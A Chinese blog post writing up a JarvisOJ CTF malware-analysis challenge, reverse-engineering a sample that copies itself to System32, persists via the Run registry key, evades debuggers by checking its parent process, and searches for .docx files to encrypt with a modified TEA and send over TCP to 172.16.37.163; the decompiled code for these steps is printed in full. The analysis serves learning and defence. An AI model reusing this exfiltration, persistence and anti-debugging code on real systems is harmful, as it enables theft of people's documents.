JarvisOJ——病毒数据分析

最新推荐文章于 2020-07-20 11:06:12 发布
最新推荐文章于 2020-07-20 11:06:12 发布
阅读量434 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35713009/article/details/88285784
版权

0x00前言

这是一道恶意代码分析的题目,其实特征不太像病毒啦。。。整个流程分析下来,还是有不少收获,虽然最后卡在了某个点,但程序的所有功能和流程都分析完成了(因为不复杂,T__T)。在这里,我就把它当作真正的恶意程序来分析一番。

0x01信息收集

一开始我们没有必要直接去逆向这个程序,而是先收集相关信息,这样能够更轻松的完成逆向分析的步骤。

0.首先将它丢进沙箱

可以看到给出的评估居然是安全的...但AVG这个反病毒引擎将其识别为了一个后门。

1.查看PE文件信息

先来看导入表

可以明显的看到修改注册表的API;而最后一个WS2_32.dll文件则是socket编程中需要使用的动态库,根据这些信息大概可以猜测这确实是个后门了,而恶意代码一般都会通过修改注册表来达到自启动的目的

在字符串列表中发现了SOFTWARE\Microsoft\Windows\CurrentVersion\Run也证实了这一点,而不远处还有一个注册表的键,它的作为只有分析程序时才能知道了。

2.监视程序行为

这个操作必须在虚拟机中完成,并且断网。监视的工作由Process Monitor来完成

可以看到这里程序自我复制到了C:\Windows\System32\CTF.exe,并将C:\Windows\System32\CTF.exe加入到注册表,然后就退出了。虽然还没正式开始分析程序,但感觉已经得到许多有用信息了呢。

0x02反调试

bool anti_debug0()
{
  int ParentProcessId; // edi
  DWORD CurrentProcessId; // esi
  signed int v2; // ecx
  signed int v3; // ecx
  HMODULE ntdll; // eax
  HANDLE hCurProcessId; // eax
  void *v7; // esi
  HWND v8; // eax
  DWORD ShellProcessId; // [esp+8h] [ebp-4Ch]
  ProcessBasicInformation pbi; // [esp+Ch] [ebp-48h]
  CHAR ProcName[4]; // [esp+24h] [ebp-30h]
  int v12; // [esp+28h] [ebp-2Ch]
  int v13; // [esp+2Ch] [ebp-28h]
  int v14; // [esp+30h] [ebp-24h]
  int v15; // [esp+34h] [ebp-20h]
  int v16; // [esp+38h] [ebp-1Ch]
  char v17; // [esp+3Ch] [ebp-18h]
  char v18; // [esp+3Dh] [ebp-17h]
  int v19; // [esp+3Eh] [ebp-16h]
  __int16 v20; // [esp+42h] [ebp-12h]
  WCHAR ModuleName[2]; // [esp+44h] [ebp-10h]
  int v22; // [esp+48h] [ebp-Ch]
  int v23; // [esp+4Ch] [ebp-8h]

  ParentProcessId = 0;
  CurrentProcessId = GetCurrentProcessId();
  v17 = 50;
  v2 = 0;
  *(_DWORD *)ProcName = 873477391;
  v12 = 137900836;
  v13 = 858662703;
  v14 = 674570284;
  v15 = 856764206;
  v16 = 841228846;
  v18 = 65;
  v19 = 0;
  v20 = 0;
  *(_DWORD *)ModuleName = 1094009135;
  v22 = 1093484837;
  v23 = 1094795565;
  do
  {
    ProcName[v2] ^= 0x41u;                      // decrypt ProcName
    ++v2;
  }
  while ( v2 < 32 );
  v3 = 0;
  do
    *((_BYTE *)ModuleName + v3++) ^= 0x41u;     // decrypt ModuleName
  while ( v3 < 12 );
  ntdll = GetModuleHandleW(ModuleName);
  NtQueryInformationProcess = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))GetProcAddress(ntdll, ProcName);
  if ( !NtQueryInformationProcess )
    return 1;
  hCurProcessId = OpenProcess(0x400u, 0, CurrentProcessId);
  v7 = hCurProcessId;
  if ( !hCurProcessId )
    return 1;
  if ( !NtQueryInformationProcess(hCurProcessId, 0, &pbi, 24, 0) )
    ParentProcessId = pbi.InheritedFromUniqueProcessId;
  CloseHandle(v7);
  v8 = GetShellWindow();
  GetWindowThreadProcessId(v8, &ShellProcessId);
  return ParentProcessId != ShellProcessId;
}

首先主函数中一开始就是一个反调试函数,以上是已标注好的代码,逻辑比较清晰,反调试方法是利用父进程反调试。利用NtQueryInformationProcess函数获取ProcessBasicInformation,取其最后一个字段就是父进程id,将父进程pid与shell的pid进行比较,若我们的父进程为调试器,则肯定是不匹配的,以此达到反调试效果。

0x03 流程分析

这段代码完成的工作就是在Process Monitor中看到的一样,写入CTF.exe文件并自启动,然后检测当前文件,若不是CTF.exe,则退出。

接着srand(time(0)),然后进入一个递归函数

DWORD __cdecl rescur_travl(WCHAR *UserDocumentPath)
{
  WCHAR *_UserDocumentPath; // edi
  __int16 *v2; // eax
  signed int v3; // edx
  __int16 v4; // cx
  int v5; // edx
  __int16 *v6; // eax
  HANDLE allFile; // ebx
  WCHAR *v9; // eax
  WCHAR *v10; // eax
  WCHAR *v11; // edx
  WCHAR v12; // cx
  char *path_len; // eax
  WCHAR *v14; // edi
  WCHAR v15; // cx
  WCHAR *v16; // edi
  WCHAR v17; // ax
  char *v18; // eax
  __int16 v19; // cx
  unsigned int v20; // eax
  WCHAR *v21; // edi
  WCHAR v22; // cx
  WCHAR v23; // cx
  int len; // eax
  DWORD v25; // esi
  struct _WIN32_FIND_DATAW FileData; // [esp+10h] [ebp-668h]
  char directorName; // [esp+260h] [ebp-418h]
  __int16 FileName[262]; // [esp+468h] [ebp-210h]

  _UserDocumentPath = UserDocumentPath;
  memset(&directorName, 0, 0x104u);
  v2 = FileName;
  v3 = 0x104;
  while ( v3 != 0x80000106 )                    // copy path to filename
  {
    v4 = *(__int16 *)((char *)v2 + (char *)UserDocumentPath - (char *)FileName);
    if ( !v4 )
      break;
    *v2 = v4;
    ++v2;
    if ( !--v3 )
      goto LABEL_7;                             // 文件路径大于缓冲区大小
  }
  if ( v3 )
    goto LABEL_8;
LABEL_7:
  --v2;
LABEL_8:
  *v2 = 0;
  v5 = 0x104;
  v6 = FileName;
  while ( *v6 )
  {
    ++v6;
    if ( !--v5 )
      goto LABEL_14;                            // 文件路径大于缓冲区大小
  }
  if ( v5 )
    sub_381000(v5, 0x7FFFFFFF, &FileName[260 - v5], (int)L"\\*");// filepath+"\*"
LABEL_14:
  allFile = FindFirstFileW((LPCWSTR)FileName, &FileData);
  if ( allFile == (HANDLE)-1 )
    return 0;
  do
  {
    v9 = FileData.cFileName;
    if ( FileData.dwFileAttributes & 0x10 )     // #define FILE_ATTRIBUTE_DIRECTORY 0x10
    {
      if ( wcscmp(FileData.cFileName, L".") && wcscmp(FileData.cFileName, L"..") )// 过滤.和..
      {
        v10 = _UserDocumentPath;
        v11 = _UserDocumentPath;
        do
        {
          v12 = *v10;
          ++v10;
        }
        while ( v12 );
        path_len = (char *)((char *)v10 - (char *)_UserDocumentPath);
        v14 = &FileData.cAlternateFileName[13];
        do
        {
          v15 = v14[1];
          ++v14;
        }
        while ( v15 );
        qmemcpy(v14, v11, (unsigned int)path_len);
        v16 = &FileData.cAlternateFileName[13];
        do
        {
          v17 = v16[1];
          ++v16;
        }
        while ( v17 );
        v18 = (char *)FileData.cFileName;
        *(_DWORD *)v16 = '\\';
        do
        {
          v19 = *(_WORD *)v18;
          v18 += 2;
        }
        while ( v19 );
        v20 = v18 - (char *)FileData.cFileName;
        v21 = &FileData.cAlternateFileName[13];
        do
        {
          v22 = v21[1];
          ++v21;
        }
        while ( v22 );
        qmemcpy(v21, FileData.cFileName, v20);
        rescur_travl((WCHAR *)&directorName);
        memset(&directorName, 0, 0x104u);
        _UserDocumentPath = UserDocumentPath;
      }
    }
    else
    {
      do
      {
        v23 = *v9;
        ++v9;
      }
      while ( v23 );
      len = v9 - &FileData.cFileName[1];
      if ( len > 3 && !wcscmp((const unsigned __int16 *)&FileData.nFileSizeLow + len + 1, L".docx") )// 比较后缀名
        NetFunction(_UserDocumentPath, &FileData);
    }
  }
  while ( FindNextFileW(allFile, &FileData) );
  v25 = GetLastError();
  FindClose(allFile);
  return v25;
}

这个函数流程如下:

  1. 遍历当前文件夹,过滤掉 . 和 ..
  2. 若当前文件为文件夹,递归
  3. 若当前文件为.docx,进入NetFunction

逻辑其实挺清晰,不过还是得看上一阵

NetFunction中就是网络数据传输了,使用了win socket编程

signed int __fastcall NetFunction(const unsigned __int16 *UserDocumentPath, _WIN32_FIND_DATAW *a2)
{
  _WIN32_FIND_DATAW *filedata; // ebx
  const unsigned __int16 *documentpath_; // edi
  signed int i; // esi
  unsigned int len_path; // edx
  WCHAR *v6; // eax
  WCHAR v7; // cx
  int filename_lenth; // esi
  unsigned __int16 *filename_buffer; // eax
  unsigned __int16 *filepath; // ebx
  char *v12; // eax
  __int16 v13; // dx
  unsigned int len_path_; // eax
  const unsigned __int16 *documentpath__; // esi
  unsigned __int16 *v16; // edi
  unsigned __int16 v17; // cx
  int v18; // edi
  __int16 v19; // ax
  char *v20; // eax
  WCHAR *v21; // edx
  __int16 v22; // cx
  unsigned int v23; // eax
  unsigned __int16 *v24; // edi
  unsigned __int16 v25; // cx
  int v26; // esi
  DWORD *AFileStruct; // edi
  HANDLE hFile; // esi
  DWORD v29; // eax
  SOCKET socket; // esi
  int v31; // [esp+10h] [ebp-3D8h]
  char optval[4]; // [esp+14h] [ebp-3D4h]
  DWORD NumberOfBytesRead; // [esp+18h] [ebp-3D0h]
  char *buffer; // [esp+1Ch] [ebp-3CCh]
  int fileSize; // [esp+20h] [ebp-3C8h]
  _WIN32_FIND_DATAW *v36; // [esp+24h] [ebp-3C4h]
  struct WSAData WSAData; // [esp+28h] [ebp-3C0h]
  struct sockaddr name; // [esp+1B8h] [ebp-230h]
  char ipaddr[4]; // [esp+1C8h] [ebp-220h]
  char v40; // [esp+1D6h] [ebp-212h]
  char recv_data; // [esp+3CCh] [ebp-1Ch]
  char randarray[8]; // [esp+3DCh] [ebp-Ch]

  filedata = a2;
  documentpath_ = UserDocumentPath;
  v36 = a2;
  i = 0;
  do
    randarray[i++] = rand();
  while ( i < 8 );
  len_path = wcslen(documentpath_);
  v6 = filedata->cFileName;
  do
  {
    v7 = *v6;
    ++v6;
  }
  while ( v7 );
  filename_lenth = v6 - &filedata->cFileName[1] + len_path + 2;
  filename_buffer = (unsigned __int16 *)operator new(2 * filename_lenth);
  filepath = filename_buffer;
  if ( !filename_buffer )
    return -1;
  v31 = 2 * filename_lenth;
  memset(filename_buffer, 0, 2 * filename_lenth);
  v12 = (char *)documentpath_;
  do
  {
    v13 = *(_WORD *)v12;
    v12 += 2;
  }
  while ( v13 );
  len_path_ = v12 - (char *)documentpath_;
  documentpath__ = documentpath_;
  v16 = filepath - 1;
  do
  {
    v17 = v16[1];
    ++v16;
  }
  while ( v17 );
  qmemcpy(v16, documentpath__, len_path_);      // add director path to filename_buffer
  v18 = (int)(filepath - 1);
  do
  {
    v19 = *(_WORD *)(v18 + 2);
    v18 += 2;
  }
  while ( v19 );
  *(_DWORD *)v18 = 92;                          // add "\"
  v20 = (char *)v36->cFileName;
  v21 = v36->cFileName;
  do
  {
    v22 = *(_WORD *)v20;
    v20 += 2;
  }
  while ( v22 );
  v23 = v20 - (char *)v21;
  v24 = filepath - 1;
  do
  {
    v25 = v24[1];
    ++v24;
  }
  while ( v25 );
  qmemcpy(v24, v21, v23);                       // add filename
  fileSize = v36->nFileSizeLow + 2 * wcslen(filepath) + 58;
  v26 = fileSize;
  if ( fileSize % 8 )
  {
    fileSize = 8 * (fileSize / 8) + 8;
    v26 = 8 * (v26 / 8) + 8;
  }
  AFileStruct = (DWORD *)operator new(v26);
  buffer = (char *)operator new(v26);
  if ( !AFileStruct )
    return -1;
  memset(AFileStruct, 0, v26);
  *AFileStruct = v36->nFileSizeLow;
  hFile = CreateFileW(filepath, 0x80000000, 1u, 0, 4u, 0x80u, 0);
  if ( hFile == (HANDLE)-1 )
    return -1;
  memcpy(AFileStruct + 1, L"bufFileContent", 28u);
  ReadFile(hFile, AFileStruct + 8, v36->nFileSizeLow, &NumberOfBytesRead, 0);
  CloseHandle(hFile);
  *(DWORD *)((char *)AFileStruct + NumberOfBytesRead + 32) = v31;
  v29 = (DWORD)AFileStruct + NumberOfBytesRead + 36;
  *(_DWORD *)v29 = *(_DWORD *)"b";
  *(_DWORD *)(v29 + 4) = *(_DWORD *)"f";
  *(_DWORD *)(v29 + 8) = *(_DWORD *)"i";
  *(_DWORD *)(v29 + 12) = *(_DWORD *)"e";
  *(_DWORD *)(v29 + 16) = *(_DWORD *)"a";
  *(_WORD *)(v29 + 20) = *(_WORD *)"e";
  memcpy((char *)AFileStruct + NumberOfBytesRead + 58, filepath, 2 * wcslen(filepath));// 
                                                // struct{
                                                //   DWORD FileSize
                                                //   WCHAR[] =  L"bufFileContent"
                                                //   char[FileSize] = FileData
                                                //   WCHAR[] = L"bufFileName"  
                                                //   char[] = filepath
                                                // }
                                                // 
  if ( WSAStartup(0x202u, &WSAData) )
    return -1;
  socket = ::socket(2, 1, 6);                   // socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
  *(_DWORD *)optval = 30000;
  setsockopt(socket, 0xFFFF, 0x1006, optval, 4);// setsockopt(socket, SOL_SOCKET, SO_RCVTIMEO, timeval, 4)
  strcpy(ipaddr, "172.16.37.163");
  memset(&v40, 0, 0x1F2u);
  name.sa_family = 2;                           // AF_INET
  *(_WORD *)name.sa_data = htons('09');         // port = 90
  *(_DWORD *)&name.sa_data[2] = inet_addr(ipaddr);// ip = 172.16.37.163
  connect(socket, &name, 16);
  send(socket, randarray, 8, 0);
  recv(socket, &recv_data, 16, 0);
  encrypt(AFileStruct, randarray, fileSize, &recv_data, buffer);
  send(socket, buffer, fileSize, 0);
  recv(socket, &recv_data, 8, 0);               // data ok!
  operator delete(filepath);
  operator delete(AFileStruct);
  operator delete(buffer);
  closesocket(socket);
  WSACleanup();
  return 0;
}

主要是创建了一个结构体

经过加密后进行TCP传送。

加密部分以变形的TEA为基础,混合了一些异或加密。TEA加密时将所有参数和输出都在字节上进行了倒置,且利用

sum -= 0x61C88647

来替代

sum += 0x9e37799b9

整个过程就算是分析完了,要对捕获的数据包进行解密,必须要知道srand(time(0))得到的rand()数组的值,但这里不太清楚去哪里找,文件分析虽然完成了,但题目依旧没有完成。。

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
jarvis oj reverse 病毒数据分析 writeup
charlie_heng的专栏
02-19 401
这题之前做过,但是做到一半就放弃了,现在又回来做一下 首先这题其实还是有点难度的 我们先来分析下main函数部分,首先它做了反debug判断,获取父进程信息 其次它还判断了程序所在位置,过了这几个判断之后,获取当前时间作为seed给srand 然后在注册表里面拿到文档所在的目录 接着在目录里面搜索docx后缀的文件,将其加密之后发送出去 在加密那里,它做了几件事 1. 生成8字节随机...
171207 逆向-JarvisOJ病毒数据分析)(2)
whklhhhh的博客
12-09 326
1625-5 王子昂 总结《2017年12月7日》 【连续第433天总结】 A. JarvisOJ-Re-病毒数据分析(2) B. 继续分析 加密算法的识别插件没有识别出来,只能自己来查找了 核心函数sub_401AD0的算法中出现了一个特征常数:v12 -= 0x61C88647;百度其发现它可能是RC5、RC6、TEA加密算法,常数通常为加法,以下式出现+0x9e3779b9;RC算
171206 逆向-JarvisOJ病毒数据分析)(1)
whklhhhh的博客
12-08 387
1625-5 王子昂 总结《2017年12月6日》 【连续第432天总结】 A. JarvisOJ-Re-病毒数据分析 B. 公司员工的计算机中招了! 在他的计算机上发现了一个病毒样本,同时网关上抓包时发现这台计算机好像传了点加密的信息出来,但是抓到的包可能有点不全,开头的一个包可能漏掉了。 请分析压缩包中病毒样本及数据包信息,解密出这台中招的计算机往外发的信息中包含的
171209 逆向-JarvisOJ病毒数据分析)(3)
whklhhhh的博客
12-11 278
1625-5 王子昂 总结《2017年12月9日》 【连续第435天总结】 A. JarvisOJ-Re-病毒数据分析(3) B. 动态调试发现tea前后内容如下 key: 29 23 BE 84 E1 6C D6 AE 87 EF 80 7C B0 FF 12 D2 明文: E4 3B 05 00 62 00 75 00 buffer: C0 00 67 02 D0 0F
Jarvis OJ
kof2019的博客
08-05 452
Jarvis OJ - 软件密码破解-1 -Writeup 转载请标明出处http://www.cnblogs.com/WangAoBo/p/7243801.html 记录这道题主要是想记录一下动态调试的过程 题目: 分析: 刚开始拿到这道题目还是想用IDA静态分析,但无奈函数太多找不到关键函数,看别人Writeup也只是说关键函数为sub_401BB0但不知道怎么找
JarvisOJ.docx
03-10
JarvisOJ Web 中,我们学习到了如何使用 JavaScript 代码分析来获取 FLAG。我们可以使用 JavaScript 代码分析工具来分析 app.js 文件,从而找到加密逻辑。 八、Web 开发 在 JarvisOJ Web 中,我们学习到了如何...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
Jarvis数据分析挖掘平台介绍.docx
10-14
Jarvis数据分析挖掘平台是一款专为企业设计的工具,旨在降低大数据分析和挖掘的技术门槛,帮助企业快速构建数据分析应用。该平台具备可视化交互特性,支持从数据接入到模型部署的全过程管理,旨在服务于数据科学家...
算法设计与分析 书本所有程序源码 ——C++代码
05-23
《算法设计与分析》是一本深入探讨算法设计技巧和分析方法的经典教材,它涵盖了各种重要的算法,包括动态规划、贪心算法、分治策略、回溯法、分支限界法等。书中涉及的C++代码是为了帮助读者更好地理解和实现这些...
病毒分析报告模板
04-05
病毒分析报告模板,让你的病毒分析跟明了,更规范
jarvis OJ
CHOOOU的博客
11-05 806
basic Baby’s Crack 程序大概就是打开一个命令行输入的 file,然后打开一个 tmp,对 file 加密写入 tmp,将 file 删除,将 tmp 重命名为 file。 直接在 ida 中 F5,关键的代码就是: while (feof(*(_QWORD *)&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;argc, argv, v8, v16) == 0)
(Jarvis Oj)(Pwn) fm
Nothing
06-18 1247
(Jarvis Oj)(Pwn) fm 查看保护。 ida查看程序逻辑。 第12行,很明显的格式化字符串漏洞,当全局变量x的值是4的时候会执行system函数,查看x的值。 x的值是3。所以就要利用格式化字符串漏洞的任意地址读写,“x_addr%[i]$n”,%n可以将已经输出的字符个数写入到指定的参数中,这个格式化字符串会在栈上的某处,需要定位x_addr作为printf的第...
jarvis oj_用一种态度来构建Jarvis,生成式聊天机器人
weixin_26632369的博客
07-20 1162
jarvis ojCarsales.com, the company I work for, is holding a hackathon event. This is an annual event where everyone (tech or non tech) comes together to form a team and build anything — anything at al...
Jarvis OJ-Login
wyj_1216 House
10-03 1115
Login 时间:2018年10月3日 汇报人:王祎洁 题目 http://web.jarvisoj.com:32772/ 题解 查看页面源代码一无所获,采取抓包,随便输入一串试一下。 抓个包, 发现后台查询password的语句,这是一个md5加密后的sql注入。 md5($pass, true): 参数一是要加密的字符串; 参数二是输出格式:true,表示输出原始16字符二进...
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1651
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
Jarvis OJ-admin
wyj_1216 House
10-06 807
admin 时间:2018年10月6日 回报人:王祎洁 题目: http://web.jarvisoj.com:32792/ 题解: 进入网页,发现只有一个hello 尝试index.php,没有发现;尝试robots.txt,发现新大陆 跳转该页面,发现一个假的flag 联想题目admin,考虑抓包修改admin,将admin=0修改成任意值,比如admin=1,运行后,发现获...
JARVISOJ RE
皮三宝好菜的博客
01-01 521
JARVISOJ RE 今天来吧三道恶心的re写一下。。。 难度从自我感觉的简单到坑排序 爬楼梯 这题其实最“简单”hiahiahia 经过多次实验,其实只要手速过快,轻轻松松啊。 //电脑xps15触屏,更加轻松了23333 =.= evil exe 文件加壳了,直接脱壳,完事后拖入ida 从里面的许多256可以联想到rc4,具体加密过程也不复杂。 这边直接给代码了。 #include &...
171227 逆向-JarvisOJ(Shell)
whklhhhh的博客
12-28 938
1625-5 王子昂 总结《2017年12月27日》 【连续第453天总结】 A. JarvisOJ-Shell B. 这个64位的upx+golang真是够折腾人的..首先查壳,发现PEiD直接罢工了,我还纳闷儿,明明都能运行了咋还不是有效的PE文件捏 然后ExeInfoPE才告诉我这货是64位文件拖入IDA发现什么都没识别出来 但是通过区段名能看出来是UPX壳然而掏UPX程序出来却

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值